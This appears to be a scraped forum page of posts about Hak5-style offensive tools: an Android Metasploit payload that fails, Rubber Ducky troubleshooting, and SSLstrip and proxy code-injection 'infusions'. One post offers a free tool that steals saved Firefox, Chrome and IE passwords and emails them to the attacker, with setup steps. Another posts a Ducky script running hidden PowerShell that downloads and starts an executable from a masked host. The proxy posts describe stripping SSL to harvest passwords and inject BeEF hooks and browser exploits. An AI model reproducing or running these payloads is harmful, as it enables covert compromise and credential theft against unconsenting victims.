Search the Community

Hello guys, Before I start, I want to say that I looked on all the forums for a solution and tried multiple options until I started writing this. I have tried to make an exploit for Android. Everything works fine until I open the apk on my test phone where after I installed it by bypassing the security restrictions, it doesn't do anything. On msf it doesn't show that it's connected to a device. As well, regardless if I stop the exploit, kill it and remove it, the server is still up and contains the file. I need a solution since I believe that this is caused by the recent changes in metasploit and android 9.

OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?xxxxxxxxx- Pass Stealer Software 2.$url = 'https://1fichier.com/?xxxxxxxxx - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. https://www.ducktoolkit.com/viewscript/59967fc4ac04af7d6d57dc54/ I Appreciated all comment or rebuild. Thanks

Hello all, i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.

Hello, it looks like i placed topic in wrong area so posting here in relative one ( as i thought i will not get reply on that post which is not related), sorry for that. i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.

Hi guys. i have a problem i don't understand what i am doing wronkg i have made a script and all time i encode all goes fine but have 0 kb inject.bin file I have try the duckencode.jar also and they give me a different error java -jar duckencode.jar -i /root/scriptduck -o /root/output.bin Error on Line: 1 Error on Line: 2 Error on Line: 3 Error on Line: 4 Error on Line: 5 Error on Line: 6 Error on Line: 7 When i run the 2.6.3 version i get this java -jar encoder.jar -i /root/scriptduck -o /root/output.bin -l resources/br.properties Hak5 Duck Encoder 2.6.3 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] DuckyScript Complete..... [ OK ] this is the script DELAY 4000 GUI r DELAY 300 STRING powershell -windowstyle hidden(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx.xxx/upload/xxxxxxxx.xxx,%TEMP%\xxxxxxxx.xxx');Start-Process "%TEMP%\xxxxxxx.exe" ENTER very easy but i don't know what is fail Im using linux kali for this some suggestions? i have lost all day try to fix this don't know what can be the strange is i have made a lot of times this script in a old linux virtual machine but i have deleted and create a new one and now i only get 0 kb .bin files

Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits: Strip SSL from sessions before injecting code which allows for a larger attack surface. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view. The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and inject BeEf hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually. Feature Set: Installer - The installer will setup the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose. Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can get passwords still in here in the process. Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions. Injection Code Editor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack. Auto Refresh Enable/Disable and Logging in Small Tile Screenshot (Interface): Screenshot (Basic Alert Pop-up): Credit: Infusion GUI: Whistle Master SSLStrip: Moxie Marlinspike Cheers!

Hi, I just got this rubber ducky. I have watched all the videos and read about a dozen topics and I don't see a single video showing someone dragging and dropping a payload onto the usb and booting it. Not one. But that's exactly what Darren says you can do to get this up and running. I used the generator, put together something- nothing. So, I decided to do a custom script, simple code: DELAY 3000 GUI R DELAY 200 STRING notepad ENTER DELAY 200 STRING Hello World!!! ENTER This should be simple enough? Doesn't require directories or anything. Still nothing. The only thing I haven't done is drop this in using Linux. But why the heck would I have to boot up linux just to drop this inject file on the drive?? What am I missing. Ugh. So frustrated. I've tried it on 2 machines now as well. This should be straight forward. Use generator, create code, drag on sd card. Well- okay, maybe my drive is too large? Is that possible? I moved the binary inject file to a 16GB card? Don't see why that would hurt though. If I'm copying target computer files I want space? And even if I get this up and running, I still have another question. In the generator.. it says "usb name: (ducky)" _______ ? If we're suppose to name it ducky to go along with various pre-written code.. why would it ask the question? And, is the answer just written in normal format or is it like, "/ducky", does lower-case matter, etc? Because at first when I did a more complicated script I thought this was going to be the problem. Heeeelp! Thanks, Morgan

Description: This is a basic implementation of a ruby HTTP proxy with the ability to inject arbitrary code into a web pages response. This allows for a multitude of attack vectors which will soon be released in my JasagerPwn script, but you can use your imagination and create your own vectors with this. Some basic attack vectors you can play with (they will also be automated in my script): beef hook injection, java applet injection, browser/plugin exploit injection. Feature Set: Installer - Install the dependencies in order to run the ruby script. Proxy Log Output - Displays the log standard output that is generated by Digininja's proxy script. Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions. Injection Code EDitor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack. Auto Refresh Enable/Disable and Logging in Small Tile Screenshot (Interface): Screenshot (Basic Alert Pop-up):